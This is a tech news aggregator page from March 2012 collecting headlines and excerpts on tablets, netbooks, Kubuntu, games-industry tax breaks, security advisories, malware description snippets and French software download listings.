Channel Image13:35 Samsung Note Android 4.0 upgrade is coming this Spring» Home - THE INQUIRER

Ice Cream Sandwich is on the way

Channel Image13:27 Ubuntu: 1402-1: libpng vulnerability» LinuxSecurity.com - Security Advisories
LinuxSecurity.com: libpng could be made to crash or run programs as your login if itopened a specially crafted file.
Channel Image13:17 Can the NSA Break AES?» Schneier on Security
In an excellent article in Wired, James Bamford talks about the NSA's codebreaking capability. According to another top official also involved with the program, the NSA made an enormous breakthrough several years ago in its ability to cryptanalyze, or break, unfathomably complex encryption systems employed by not only governments around the world but also many average computer users in the...
Channel Image13:00 Acer Iconia Tab A510: Tegra 3 Hits $450» AnandTech

Asus's Transformer Prime just got some company. Available for pre-order today, the Acer Iconia Tab A510 brings the price of entry for a 10.1" Tegra 3-powered tablet down to a cool $449.99, $50 less than the similarly equipped Asus offering. Like the Prime the A510 features a 10.1" 1280x800 display, the 1.3 GHz Tegra 3 SoC with 1 GB of RAM and 32 GB of storage expandable by microSD. The base battery life on the A510 is an impressive 36.26Whr, not quite as much as the new iPad, but somewhat higher than its prececessor and the Prime. That big battery does lead to a somewhat portly frame, with a thickness cresting a centimeter and weighing nearly 100g more than the Prime. The frame is similar to the A200 we saw in January, but is actually a little thinner and with a textured back for extra grip. 

Android 4.0 is on order for software, complete with Acer's Ring UI, a relatively innocuous skin that mainly seeks to put your most commonly used apps in easy reach. When we took a look at the A500, we were pleased with its display quality, not quite IPS but great for a vanilla LCD; we hope we can expect more of the same from this display. Software pre-load includes the usual branded media players and print software, along with Polaris Office 3.5 for productivity. Gone though, is the full-sized USB port, replaced by microUSB, though it remains compatibile with portable HDD up to 2TB in size. 

There's no shortage of options for tablet buyers right now, and everyday another pops up. But if performance, battery life and price are your main criteria, the A510 may just be the tablet for you. Pre-orders start today for $449.99 at your favorite e-tailers; no ship dates are available. 

Channel Image12:16 Europe's IT Agency kicks off in Estonia» Latest Articles

The agency, dedicated to running large EU-wide IT systems, has officially begun work in Estonia, and will initially focus on databases related to visas and fingerprints, with other systems likely to follow

(ZDNet UK - Regulation)

Channel Image11:53 Windows Phone goes to China with HTC Eternity» Latest Articles

The HTC Eternity is the first Windows Phone to be sold in China, and comes with a version of the operating system tailored to Chinese characters

(ZDNet UK - Mobile Devices)

Channel Image11:36 Paul Allen (Microsoft) consacre 300 millions de dollars à la recherche sur le cerveau» ZDNet News
Le cofondateur de Microsoft a fait un nouveau don à sa fondation scientifique créée il y a 9 ans pour financer des travaux de recherche en neuroscience.
Channel Image11:33 Report: Apple schemes to win vote on nano-SIM» Latest Articles

Apple is lining up extra votes in the European Telecommunications Standards Institute, reports say, as it seeks to get backing for its new nano-SIM standard

(ZDNet UK - Application Development)

Channel Image11:32 Des escrocs en ligne tentent de profiter de l'affaire MegaUpload» ZDNet News
Deux arnaques, aux modes opératoires différents, tentent d’extorquer de l’argent aux internautes en leur faisant croire qu’ils ont été repérés par les ayant droits.
Channel Image11:11 AUDIO: Tax breaks for creatives a 'growth measure'» BBC News - Technology
Jas Purewal, a lawyer specialising in interactive entertainment, talks about how the film and gaming industries in Britain got a boost from yesterday's Budget.
Channel Image10:45 Hacktivists hit businesses harder than fraudsters» Latest Articles

While more than 80 percent of the data breaches in 2011 were due to organised criminal activity, the number of records pilfered by activist groups represented 58 percent of the total, a new report has found

(ZDNet UK - Security Threats)

Channel Image10:05 Les hackers de LulzSec sont-ils de retour ?» ZDNet News
Une vidéo mise en ligne sur YouTube dément la mort du groupe de hackers LulzSec depuis l’arrestation de ses meneurs présumés. Des nouvelles actions sont annoncées le 1er avril. Canular ou vrai retour ?
Channel Image10:00 Quick Look: ASUS 1025C and Cedar Trail» AnandTech

We've known about Cedar Trail for quite a while now, the next iteration of Intel's Atom processor line. As far as the CPU is concerned, not a lot has changed from the previous generation Pine Trail. Cedar Trail is manufactured on Intel's 32nm process technology, but the CPU architecture is still in-order. You can read more of our Cedar Trail coverage in our initial look at the platform. It's taken far longer than expected, but we finally got someone to send us a Cedar Trail netbook for review. That someone is ASUS, and the netbook is their 1025C.

We'll have our full review in the future, but in the meantime we thought we'd give some quick impressions of performance and, more importantly, battery life during video playback. I'll cut straight to the chase with regards to CPU performance: it's largely unchanged from the last version, which means Atom N2600 still feels quite sluggish for many tasks. Atom is faster than ARM A9 CPUs, and you can see a comparison of Sunspider 0.9.1 with various tablets below, but for Windows 7 it's still painfully slow at times.

SunSpider JavaScript Benchmark 0.9.1

The bigger change however is in the GPU, where the old GMA 3150 (itself a minor tweak to the even older GMA 950) is finally getting a needed upgrade. This won't turn Atom into a gaming system by any stretch of the imagination, but it does finally bring GPU accelerated H.264 decoding into the Atom ecosystem (without the need for a discrete GPU). What does that mean for performance? It means HD YouTube video can finally run without dropping a ton of frames—at least, the 720p videos that I tested played back without any major issues. 1080p video still experiences quite a few dropped frames, unfortunately, but then you don't need to stream 1080p video if you're using the integrated 600p LCD.

But YouTube HD video has always demanded more than local video playback, and we can now finally get DXVA assisted playback of H.264 video content. I tested both 720p and 1080p H.264 videos without any major issues using MPC-HC. What's more, I ran our standard H.264 battery life test to see how the Atom N2800 fared—and I ran it a second time with a 1080p video stream just for good measure. Check out the results:

Video Playback - H.264 720p

Atom and netbooks in general still aren't going to set the world on fire with performance, but if there's one thing Atom can do well it's long battery life. Cedar Trail takes the previous Atom results and improves on them by over 50% in video playback tests. Tablets still generally do better here, but gIven that Cedar Trail now supports HDMI output, you could conceivably use an Atom netbook as a portable media player in addition to standard laptop tasks.

I tested Hulu and Netflix on the 1025C as well and both worked reasonably well, but only with SD content. That's not an issue for Hulu, but Netflix HD content completely lost A/V sync. It may be that Hulu and Netflix are not currenlty recognizing the GMA 3600, but until this is addressed it's worth noting.

There's still a question of whether a $300 netbook has a place in the market when we've got tablets to play with, but it's really a matter of intended use as well as price. ASUS' own Eee Prime Transformer offers a better display and a nifty touch interface that easily surpasses the Windows 7 Starter experience, but if you're looking to do mundane tasks like basic word processing you'll need the keyboard attachment, which takes the final price up to ~$550—nearly twice that of the Eee PC 1025C. For basic typing, then, the price of the 1025C makes it a better choice, and you get excellent battery life that will easily carry you through a day of use and then some.

Atom still isn't going to surpass AMD's Brazos for performance or GPU driver quality, but pricing and battery life still appear to be in favor of Intel's Atom, and 10.1" Brazos netbooks are pretty rarefied. We'll have our full review as soon as we can finish running the remaining benchmarks and doing additional testing, which might be a while. Hopefully we'll see equally impressive improvements for Internet and Idle battery life, but it took over ten hours to recharge the battery on the 1025C and eight hours plus for our video playback test, so basically I'm look at a full day for each battery test cycle to complete.

Channel Image08:59 Sous-traitance : Apple reconnaît que les conditions de travail peuvent s’améliorer» ZDNet News
D’après un indicateur mensuel mesuré par Apple, les ouvriers des usines de ses sous-traitants sont 89% à respecter la règle de la semaine de 60 heures maximum, avec une durée moyenne de 48 heures.
Channel Image08:37 Screenshots: Photoshop CS6 Beta» Latest Articles

Adobe has released the beta of the CS6 version of Photoshop, the industry standard image editing application. We've been looking at some of its many new features.

(ZDNet UK - Content Creation)

Channel Image08:36 "Dangers d’Internet" : l'assureur Axa propose de protéger les internautes français» ZDNet News
A sa protection contre les risques courants de la vie, Axa adosse désormais un contrat d’assurance contre les « dangers d’Internet », dont l’usurpation d’identité ou les atteintes à la e-réputation.
Channel Image07:50 Nouvel iPad : iPhoto compte 1 million d’utilisateurs» ZDNet News
La nouvelle version de l’application payante a été lancée au moment de la présentation de l’iPad 3ème génération.
Channel Image07:35 Firefox va adopter le chiffrement SSL pour les recherches Google» ZDNet News
Cette fonctionnalité est actuellement en phase initiale de test et devrait normalement être intégrée à la version stable du navigateur dans les mois qui viennent.
Channel Image06:42 Twitter fête ses 6 ans et affiche 140 millions d'utilisateurs actifs» ZDNet News
Le site de micro blogging compte désormais 140 millions d’utilisateurs actifs.
Channel Image04:14 ISC StormCast for Thursday, March 22nd 2012 http://isc.sans.edu/podcastdetail.html?id=2416, (Thu, Mar 22nd)» SANS Internet Storm Center, InfoCON: green
...(more)...
Channel Image02:00 Gigabyte GA-A55M-S2V Review» AnandTech

Today we are looking at the Gigabyte GA-A55M-S2V, the first A55 motherboard to hit the AnandTech test beds. In comparison to the A75 platform which we have covered extensively, although the A55 lacks a few features such as USB 3.0, SATA 6 Gbps and a second full length PCIe slot, the A55 motherboards are usually aimed at low end, low budget system builders. The Gigabyte GA-A55M-S2V comes in at a smaller than mATX form factor for just such occasions.  Please read on for the full review.

Channel Image01:07 Tax breaks 'level' video game play» BBC News - Technology
How tax breaks could transform the UK games industry
Channel Image01:06 Game sales surpassed video in UK» BBC News - Technology
Computer game sales overtook those of videos for the first time last year, an industry report suggests.
Channel Image00:00 SugarSync Manager (22/03/2012)» 01net. Telecharger.com - Les nouveaux téléchargements pour mac
Synchronisez vos fichiers entre plusieurs machines


Channel Image00:00 Pinterextension pour Opera (22/03/2012)» 01net. Telecharger.com - Les nouveaux téléchargements pour mac
Epinglez plus rapidement des images sur Pinterest


Channel Image00:00 Pinterextension pour Opera (22/03/2012)» 01net. Telecharger.com - Les nouveaux téléchargements pour linux
Epinglez plus rapidement des images sur Pinterest


Channel Image00:00 Pinterest Right-Click pour Firefox (22/03/2012)» 01net. Telecharger.com - Les nouveaux téléchargements pour linux
Créez et ajoutez des "Pins" - image ou vidéo - par un simple clic droit


Channel Image00:00 Pinterest Right-Click pour Firefox (22/03/2012)» 01net. Telecharger.com - Les nouveaux téléchargements pour mac
Créez et ajoutez des "Pins" - image ou vidéo - par un simple clic droit


Channel Image00:00 Picasa (22/03/2012)» 01net. Telecharger.com - Les nouveaux téléchargements pour mac
La célèbre gestionnaire d'albums photos sur Mac


Channel Image00:00 Nanny Parental Control (22/03/2012)» 01net. Telecharger.com - Les nouveaux téléchargements pour linux
Contrôlez l'utilisation d'Internet par vos enfants


Channel Image00:00 Google Chrome 17 (22/03/2012)» 01net. Telecharger.com - Les nouveaux téléchargements pour mac
Le navigateur Internet par Google


Channel Image00:00 Google Chrome 17 (22/03/2012)» 01net. Telecharger.com - Les nouveaux téléchargements pour linux
Le navigateur Internet par Google


Channel Image00:00 FreeDiams (22/03/2012)» 01net. Telecharger.com - Les nouveaux téléchargements pour linux
Gérez les prescriptions médicales et détectez les interactions médicamenteuses


Channel Image00:00 FreeDiams (22/03/2012)» 01net. Telecharger.com - Les nouveaux téléchargements pour mac
Gérez les prescriptions médicales et détectez les interactions médicamenteuses


Channel Image00:00 Drawn : Trail of Shadows (22/03/2012)» 01net. Telecharger.com - Les nouveaux téléchargements pour mac
Rejoignez un univers magique de peintures et de fééries où l'inspiration et le rêve s'unissent pour lutter contre le mal


Channel Image00:00 DTREG (22/03/2012)» 01net. Telecharger.com - Les nouveaux téléchargements pour windows
Programme d'analyse statistique qui génère des arbres de décision, de classification et de régression
Channel Image00:00 Avast Antivirus Beta (22/03/2012)» 01net. Telecharger.com - Les nouveaux téléchargements pour mac
Une version Beta d'Avast combinant 3 filtres : Web, mail et système


Channel Image00:00 Audio Hijack Pro (22/03/2012)» 01net. Telecharger.com - Les nouveaux téléchargements pour mac
Enregistrez tous les flux audio qui passent sur votre Mac


Channel Image00:00 Age of Decadence (22/03/2012)» 01net. Telecharger.com - Les nouveaux téléchargements pour windows
Jeu de rôle au tour par tour dans un monde post apocalyptique inspiré de la chute de l'Empire Romain
Channel Image00:00 Adobe Photoshop - beta (22/03/2012)» 01net. Telecharger.com - Les nouveaux téléchargements pour mac
Artistes, amateurs ou professionnels : découvrez la prochaine version du logiciel de retouche photo


Wed 21 March, 2012

Channel Image21:21 Apple TV 3 (2012) Short Review - 1080p and better WiFi» AnandTech

The iPad (3) took front row during the recent launch extravaganza, however Apple also refreshed their Apple TV with a new model sporting a single core A5 SoC and some other noteworthy tweaks. We've spent some time with the new model since its launch, and have found a few interesting new things lurking inside. In addition to decoding 1080p iTunes content and Netflix streams, the new Apple TV also includes a second WiFi antenna with better gain, which translates to improved reception and network throughput.  

Read on for our quick review.

Channel Image20:45 Ubuntu: 1400-3: Thunderbird vulnerabilities» LinuxSecurity.com - Security Advisories
LinuxSecurity.com: Several security issues were fixed in Thunderbird.
Channel Image20:40 ISC Feature of the Week: Presentations and Papers, (Wed, Mar 21st)» SANS Internet Storm Center, InfoCON: green
Overview ISC's https://isc.sans ...(more)...
Channel Image20:36 Another Liars and Outliers Excerpt» Schneier on Security
IT World published an excerpt from Chapter 4....
Channel Image19:04 Tax breaks for UK games industry» BBC News - Technology
The chancellor has announced tax breaks for the games industry, a move welcomed by the industry.
Channel Image18:29 Mass Effect 3 row prompts change» BBC News - Technology
Mass Effect 3 developer Bioware says it will provide extra game content for fans left unhappy by the series' conclusion.
Channel Image17:54 Florida Dealer Tacks on $7,000 Markup to Red Hot Prius C Hybrid» DailyTech Main News Feed
Dealers are at it again when it comes to popular hybrids
Channel Image17:50 3/21/2012 Daily Hardware Reviews» DailyTech Main News Feed
DailyTech's roundup of hardware reviews from around the web for Wednesday
Channel Image16:23 Super-connected cities announced» BBC News - Technology
Ten cities have been chosen to benefit from super-fast broadband with 10 smaller ones to come, the chancellor announces.
Channel Image16:01 Apple CEO Tim Cook Intervenes in Unlocking iPhone 3GS for AT&T Customer in Canada» DailyTech Main News Feed
The customer couldn't get AT&T or Apple stores to unlock his iPhone, so he went straight to Tim Cook for help
Channel Image16:00 Cinavia DRM: How I Learned to Stop Worrying and Love Blu-ray’s Self-Destruction» AnandTech

DRM (Digital Rights Management) is intended to protect media from being played in an unauthorized manner. However, more often than not, it fails to serve the purpose. Today, we will take a detailed look at Cinavia, a DRM mechanism which has recently become mandatory for all Blu-ray players to support.

 

We will see how Cinavia is different from other Blu-ray DRM mechanisms, and find out whether it will actually help in reducing media piracy. In almost all cases, it is the law-abiding consumer who is put to much inconvenience. Will Cinavia be doing the same? While we are on the subject of Blu-rays, we will also try to identify areas where user-friendliness can be improved and how consumers can get the best possible experience from them. Read on for our opinion piece..

Channel Image15:49 VIDEO: India: The Digital Divide» BBC News - Technology
Young people in rural India receive their first computer
Channel Image15:34 Report: Porsche Working on Panamera Plug-In Hybrid for 2014» DailyTech Main News Feed
Car is expected to come to the US
Channel Image15:19 Kubuntu and the state of free consumer software» blogs.kde.org blogs

Since I had to announce that Canonical was dropping support for Kubuntu from 12.11 (and then had to announce two days later they were dropping support for 12.04) I've been getting lots of people asking "is this the end of KDE?"

Of course it isn't, KDE is a vibrant community of people making useful and fun software.

Recently Gnome have been noticing they're not winning either. There is a growing realisation that Canonical dropped Gnome some years ago. [This is melodramatic overstatement, there are still a bunch of Gnome programmes used in Ubuntu Desktop but the workspace and webbrowser and e-mail client aren't. Canonical is also using more Qt and less GTK.] Articles like GNOME 3: Why It Failed don't really help the impression.

All this just highlights that we've been making free software for users for over 15 years and still not got out of the geek market. This comment from mpt, canonical designer highlights some reasons why: third party software, marketing to users but importantly to OEMs and their supply chains, online services, an SDK etc.

= So how can KDE remain relevant? =

Better design? This was one of the comments from Ettrich when I first met him at a trade show ages ago. We can call it "usability" but design is a slightly broader term of stepping back and working out why certain tasks are hard to do.

New markets? Aaron and his Make Play Live company is making hardware devices with the Vivaldi tablet, that's exciting. That's a small company. Canonical is a large company and may well do the same, will be interested to see if either work.

Fill in the gaps! There is a common meme that "we've achieved what we wanted 15 years ago", well free software in general has but KDE is really nowhere near a usable desktop. We miss a decent web browser, our office suite is looking promising but still isn't much used, the plasma media centre has never got past an alpha stage, Kontact is losing popularity due to a bumpy transition to Akonadi. There's lots to be working on!

App shop? It's what users expect now. Ubuntu has one from Canonical. Muon in Kubuntu is decent and Plasma Active are working on one but they need to link up to third party suppliers.

Server! We should be welcoming in OwnCloud and Kolab to the KDE community. So far we've failed to do that.

Modularisation. KDE Frameworks 5 is a great project, it might mean developers like Canonical start picking up bits of KDE technology as well as Qt.

Take advantage of Qt project. It's there for the using, has some bumpy areas in the infrastructure (you can't download a patch without a whole clone) and social structures but we can help them.

= And how can Kubuntu remain relevant? =

Kubuntu has the world's largest Linux desktop rollout. I'll say that again. Kubuntu, often mistaken as a mere derivative of Ubuntu, has more spread than any other desktop Linux. Since I had to announce Canonical moving to focus on Unity I've been contacted by plenty of people saying they rely on Kubuntu. Fortunately Kubuntu isn't going anywhere, that's the advantage of Free Software, when you have a cool community (and we have about the most active community of any part of Ubuntu) then it carries on. We may even find new sponsors.

We like to show KDE at its best. We are the only regularly released distro to ship only KDE Software on the desktop(*), others fill it in with GTK tools or their own config tools, we want to be all KDE. [For the benefit of those journalists who don't understand 'regularly' we ship every six months, just like KDE SC]

(*)There is one bug in the above which is shipping LibreOffice, I think the time is right to move to Calligra, they are doing great stuff and need our support to get it to users. They also are reputed to have better MS Office format importers than LibreOffice thanks to the work of KO.

We must remain part of Ubuntu, they are a great community for distros and we couldn't survive without them. Kubuntu is often incorrectly called a "derivative" of Ubuntu but we are part of the Ubuntu family and we are one of their flavours which is just where we should be.

New markets? Kubuntu Active is taking shape. I'd love to have TV friendly media centre support too for example.

But do we need a new name? Kubuntu has never been a great name, it was actually a joke name made up by the original Ubuntu developers for the KDE side. I wonder if a new name would give us a new lease of life like Calligra has. Suggestions welcome :)

Channel Image15:13 World of Warcraft may go mobile» BBC News - Technology
Developers of the popular video game World of Warcraft say they are considering porting the title to smartphones and other mobile devices as subscriptions fall.
Channel Image15:00 New Bill Looks to Place Warning Labels for Aggressive Behavior on Almost All Video Games » DailyTech Main News Feed
If the bill were to pass, the Consumer Product Safety Commission would have 180 days to place the new warning label on almost all games
Channel Image14:12 Sky announces NowTV net service» BBC News - Technology
Sky reveals more details of its new pay-as-you-go internet TV service, NowTV.
Channel Image14:06 Slow internet fears for Olympics» BBC News - Technology
The Internet Service Providers' Association warns that the UK's internet infrastructure may struggle during the Olympic Games.
Channel Image14:02 Yet Another NASA Laptop Stolen; Contains NASA KSC Employee Information» DailyTech Main News Feed
NASA KSC has local law enforcement as well as NASA authorities on the case to see who is behind the breach
Channel Image13:00 Rosewill Capstone 450W and 650W 80Plus Gold» AnandTech

We tested the Hive 550W a short while ago, and now Rosewill is following up with their Capstone series, which should be more efficient (80 Plus Gold certification). In this article we will see if the quality of this power supply can match the flawlessness of brands like Seasonic. The Capstone 450W and 650W are little different internally compared to the Hive models. All of the Capstone power supplies are targeted at the high-end market, so our expectations are quite high for this product.

The Capstone series has the goal of delivering performance, quality, and high efficiency; simply put, it's the best solution Rosewill can provide at the moment. The previous tested PSU was made by Sirtec (High Power), but the new models come from a different manufacturer. On the following pages we will show who built these PSUs. Read on to find out how it compares to other offerings.

Channel Image12:59 Le candidat Sarkozy promet une lutte « tous azimuts contre les sites illégaux »» ZDNet News
Dans une lettre à la SACD, le candidat à la présidentielle précise son programme dans le domaine de la culture dans l’économie numérique : du répressif avec la lutte contre le téléchargement étendue au streaming et téléchargement direct (blocage de site, déréférencement…), mais aussi le développement de l’offre légale et le financement des contenus par des géants de l’Internet.
Channel Image12:54 Game to file for administration» BBC News - Technology
Struggling video games retailer Game Group says it intends to file for administration, following a suspension of its shares.
Channel Image12:26 Unprinter» Schneier on Security
A way to securely erase paper: "The key idea was to find a laser energy level that is high enough to ablate - or vaporise - the toner that at the same time is lower than the destruction threshold of the paper substrate. It turns out the best wavelength is 532 nanometres - that's green visible light - with a...
Channel Image11:54 Rapprochement Linux et Android : rien de neuf pour les développeurs d’applications» ZDNet News
Avec 7.000 lignes de code Android intégrées dans le noyau Linux, la révolution n’est pas au rendez-vous, même si selon Greg Kroah-Hartman, spécialiste Linux, cela devrait simplifier la tâche des constructeurs pour la conception de systèmes Android.
Channel Image11:51 Deux nouveaux AMD FX au 2nd trimestre» HardWare.fr
Channel Image10:13 Netflix Changes Terms of Service, Makes It Difficult to Sue» DailyTech Main News Feed
Netflix likely changed this in response to its loss of a class-action suit in 2011
Channel Image10:07 Oracle : des ventes de matériel toujours en berne» ZDNet News
Si pour son troisième trimestre fiscal, Oracle enregistre une légère croissance de son chiffre d'affaires, sur le volet hardware, la firme continue de prendre l’eau avec des ventes de produits en baisse de 16%.
Channel Image09:39 Microsoft bannit les achats d’iPad et Mac en interne ?» ZDNet News
Selon un email reproduit par ZDNet, et qui émanerait d’un cadre dirigeant de Microsoft, l’éditeur interdirait désormais l’achat de Mac et d’iPad avec le budget de l’entreprise.
Channel Image09:15 Angry Birds activity parks launch» BBC News - Technology
Children's activity parks based on the popular smartphone game Angry Birds are set to be built in the UK, Finland and other countries.
Channel Image09:12 HP fusionne ses divisions imprimantes et PC» ZDNet News
Il s'agit (encore une fois) de réduire les coûts et de simplifier le fonctionnement des deux entités en jouant sur leur complémentarité.
Channel Image08:23 Apple écarte tout problème de surchauffe du nouvel iPad» ZDNet News
Malgré des tests révélant que le nouvel iPad affiche 5,3 degrés de plus que l’iPad 2, Apple assure que sa tablette respecte ses « normes thermiques ».
Channel Image08:03 Presse Web : le New York Times restreint son accès gratuit» ZDNet News
Un an après le passage au payant, le New York Times totalise 454.000 abonnés. Un bilan encore insuffisant pour le site qui va réduire de 20 à 10 le nombre d’articles qui peuvent être consultés gratuitement par les internautes. Un levier de recrutement efficace ?
Channel Image07:35 Puget Systems Echo: Intel and AMD Showdown at 65 Watts» AnandTech

Just about anyone can put together a solid computer using a decent midtower and the right parts. What we don't see as often is just how fast a computer can be assembled in a small form factor. More and more, too, the term "fast" isn't an all-encompassing one; as the GPU becomes increasingly important, the definition gets foggier and foggier. Today, all of these considerations collide as we test two top end configurations from Puget Systems against each other.

On the outside it looks we have two systems assembled in Antec's ISK-110 enclosure, but on the inside, we have a showdown between Intel and AMD's best and brightest at 65 watts. The more cynical (and admittedly informed) reader may already have an idea of where this is going, but there are definitely some surprises in store. Read on to find out where each platform performs better, as well as our thoughts on the best use case for each system.

Channel Image06:00 The Top 15 Best-Selling PC Games Of All Time» Reviews Tom's Hardware US
The Top 15 Best-Selling PC Games Of All TimeThe best-selling titles aren't always the best ones. Fortunately, a number of games that make this list actually are amongst our favorites. Check out this list of top sellers and let us know if the market agrees with the games you remember most fondly.
Channel Image02:11 Baffling Illness Strikes Africa, Turns Children Into Mindless "Zombies"» DailyTech Main News Feed
World Health Organization is on high alert about new Ugandan outbreak, cause is not fully known
Channel Image01:54 Virus Bulletin Spam Filter Test, (Wed, Mar 21st)» SANS Internet Storm Center, InfoCON: green
Virus Bulletin updated its spam filter test, and found that compared to last year, spam filters are ...(more)...
Channel Image01:04 Biomining: Bacteria 'mine' copper» BBC News - Technology
Why Chile is dunking its mined rocks into microbes
Channel Image00:45 HP's IPG, PC Units Merger Positions ex-Palm CEO as Potential Future CEO» DailyTech Main News Feed
Finally smart moves from HP -- company hands future of PC and printing to proven leader Todd Bradley
Channel Image00:00 ShareMouse (21/03/2012)» 01net. Telecharger.com - Les nouveaux téléchargements pour mac
Dirigez plusieurs unités centrales depuis un seul combiné clavier/souris


Channel Image00:00 Rhyme Genie (21/03/2012)» 01net. Telecharger.com - Les nouveaux téléchargements pour mac
Un logiciel pour vous aider à trouver la bonne rime


Channel Image00:00 NeXpose Community Edition (21/03/2012)» 01net. Telecharger.com - Les nouveaux téléchargements pour linux
Solution de gestion de vulnérabilité gratuite


Channel Image00:00 NeXpose Community Edition (21/03/2012)» 01net. Telecharger.com - Les nouveaux téléchargements pour linux
Solution de gestion de vulnérabilité gratuite


Channel Image00:00 Mozilla Firefox 12 Beta (21/03/2012)» 01net. Telecharger.com - Les nouveaux téléchargements pour linux
La version Beta du navigateur au panda roux de Mozilla


Channel Image00:00 Mozilla Firefox 12 Beta (21/03/2012)» 01net. Telecharger.com - Les nouveaux téléchargements pour mac
La version Beta du navigateur au panda roux de Mozilla
Channel Image00:00 MotionComposer (21/03/2012)» 01net. Telecharger.com - Les nouveaux téléchargements pour mac
Animez le contenu de vos pages Web


Channel Image00:00 MenuEveryWhere (21/03/2012)» 01net. Telecharger.com - Les nouveaux téléchargements pour mac
Affiche le menu directement sur la fenêtre et non en haut de l'écran


Channel Image00:00 Mangle (21/03/2012)» 01net. Telecharger.com - Les nouveaux téléchargements pour mac
Lisez vos mangas sur votre Kindle


Channel Image00:00 Little Snitch (21/03/2012)» 01net. Telecharger.com - Les nouveaux téléchargements pour mac
Gardez un oeil sur toutes les connexions entrantes et sortantes
Channel Image00:00 Le Tarot (21/03/2012)» 01net. Telecharger.com - Les nouveaux téléchargements pour mac
Jouez au tarot à 4 selon les règles officielles


Channel Image00:00 KTorrent (21/03/2012)» 01net. Telecharger.com - Les nouveaux téléchargements pour linux
Client Bittorrent très complet et malgré tout léger


Channel Image00:00 Google Chrome 18 Beta (21/03/2012)» 01net. Telecharger.com - Les nouveaux téléchargements pour mac
La version beta du navigateur de Google


Channel Image00:00 ESET Cybersecurity pour Mac (21/03/2012)» 01net. Telecharger.com - Les nouveaux téléchargements pour mac
Protège votre Mac des attaques extérieures


Channel Image00:00 DataCleaner (21/03/2012)» 01net. Telecharger.com - Les nouveaux téléchargements pour linux
Nettoyer vos bases de données des jeux d'informations superflus.


Channel Image00:00 Collectorz.com Book Collector (21/03/2012)» 01net. Telecharger.com - Les nouveaux téléchargements pour mac
Créez votre propre bibliothèque virtuelle


Channel Image00:00 Adore Puzzle (21/03/2012)» 01net. Telecharger.com - Les nouveaux téléchargements pour mac
Visitez toute l'Europe et ses monuments historiques dans ce jeu de puzzle


Channel Image00:00 A Cleaner YouTube pour Safari (21/03/2012)» 01net. Telecharger.com - Les nouveaux téléchargements pour mac
Masquez toutes les informations superflues sur YouTube


Channel Image00:00 1st Mac Mailer (21/03/2012)» 01net. Telecharger.com - Les nouveaux téléchargements pour mac
Un outil d'envoi massif d'e-mails pour campagne marketing


Tue 20 March, 2012

Channel Image22:26 Kubuntu Active on ARM» blogs.kde.org blogs

I've been playing with getting Kubuntu Active on ARM. Getting a working ARM setup is a lot like getting a working Linux desktop setup when I started in 1999. It's unclear what computer you need, it's unclear what install image you need, it's unclear how you install it and then it doesn't work and it's unclear how you debug it. For some unknown reason Ubuntu Desktop images from precise don't work on my Pandaboard but from oneiric they do. Ubuntu Server from precise seems to work so I've installed that and installed the Kubuntu Active packages on top of it. Maybe soon we'll have working Kubuntu Active images on ARM.

The application in this photo is Muon Installer QML which is a shiny new app installer being written by Aleix Pol and now available from the new Cyberspace PPA which is going to contain daily builds of various KDE projects.


Weel are ye wordy o'a grace, As lang's my ARM.

Channel Image19:34 Exécuter un script PHP à partir de la ligne de commande» Denis Szalkowski Formateur Consultant
PHP, un excellent langage, fait aussi pour le Scripting !Vous pouvez exécuter, indifféremment sous Linux et sous Windows, des scripts PHP à partir de la ligne de commande, à la manière de Perl ou de PowerShell !

Dsfc Dsfc Dsfc sur Tout le Monde en Blogue

Channel Image18:32 Nissan Leaf to Get 25-Mile Range Boost in Cold Weather Due to New Heater Design» DailyTech Main News Feed
2013 Nissan Leaf to see up to a 25-mile range boost in cold weather
Channel Image18:01 Woz Praises Mike Daisey's Apple Attack; Says it May be Lies, But it Pushed Change» DailyTech Main News Feed
Apple's co-founder lends his support to embattled monologist
Channel Image17:40 Updated: Apple's Response on iPad Heat Concerns: "Don't Worry About It"» DailyTech Main News Feed
Apple says that the new iPad's temperature readings are within spec
Channel Image17:27 3/20/2012 Daily Hardware Reviews» DailyTech Main News Feed
DailyTech's roundup of hardware reviews from around the web for Tuesday
Channel Image17:09 Google Maps délaissé par des sites en raison de son coût jugé excessif» ZDNet News
En rendant les requêtes Google Maps payantes au-delà de 25.000 par jour, Google a encouragé les plus gros consommateurs, dont FourSquare, à envisager des alternatives, parmi lesquelles OpenStreetMap.
Channel Image17:05 Trojan-Dropper.Win32.Agent.ceqq» Securelist / Descriptions
Once launched, the Trojan performs the following actions: It extracts a file from its body and saves it in the system as: %System%\mspyeajp.dll (36 865 bytes; detected by Kaspersky Anti-Virus as...
Channel Image17:03 Trojan-Downloader.Win32.Agent.fdi» Securelist / Descriptions
Once launched, the Trojan determines the location of MS Internet Explorer and launches it for execution. It uses the "IEFrame" window class name to determine the process ID and uses this to open the...
Channel Image17:01 Trojan-Dropper.Win32.Agent.crbk» Securelist / Descriptions
Once launched, the Trojan extracts the following file from its resources to the current user's temporary directory: %Temp%<rnd1>.vbs where <rnd1> is a random set of numbers and letters,...
Channel Image16:42 Porsche Unleashes 918 Spyder Hybrid Prototype on the Racetrack» DailyTech Main News Feed
Ugly and epic all in one
Channel Image16:29 PC-Ready Samsung Exynos 5 Aims to Achieve ARM Dominance» DailyTech Main News Feed
New ARM superchip will challenge Snapdragon 4 for market dominance
Channel Image16:11 Vibrating tattoo alerts proposal» BBC News - Technology
Nokia files a patent application for magnetic tattoos or other markings that vibrate to let users know if they are being called or texted.
Channel Image15:06 AMD lance les Opteron 3200» HardWare.fr
Channel Image14:52 Hacking Critical Infrastructure» Schneier on Security
A otherwise uninteresting article on Internet threats to public infrastructure contains this paragraph: At a closed-door briefing, the senators were shown how a power company employee could derail the New York City electrical grid by clicking on an e-mail attachment sent by a hacker, and how an attack during a heat wave could have a cascading impact that would lead...
Channel Image14:26 Règles de confidentialité de Google : la Cnil demande des précisions» ZDNet News
Nombre de plaintes des internautes, traitement des données de localisation et d’identification des terminaux, périmètre d’application des nouvelles règles de confidentialité… En tout, 69 questions précises ont été adressées à Google pour vérifier la conformité de ces règles avec le droit européen.
Channel Image14:10 Radeon HD 7990 pour avril ?» HardWare.fr
Channel Image13:43 Le MIT ambitionne de bâtir un campus virtuel et gratuit» ZDNet News
Le Massachusetts Institute of Technology va lancer au printemps son initiative MITx qui vise à mettre à disposition des étudiants des cours interactifs, via sa plate-forme logicielle au code source ouvert appelée OpenCourseWare.
Channel Image13:35 Des disques durs de 60 To d'ici 10 ans ?» ZDNet News
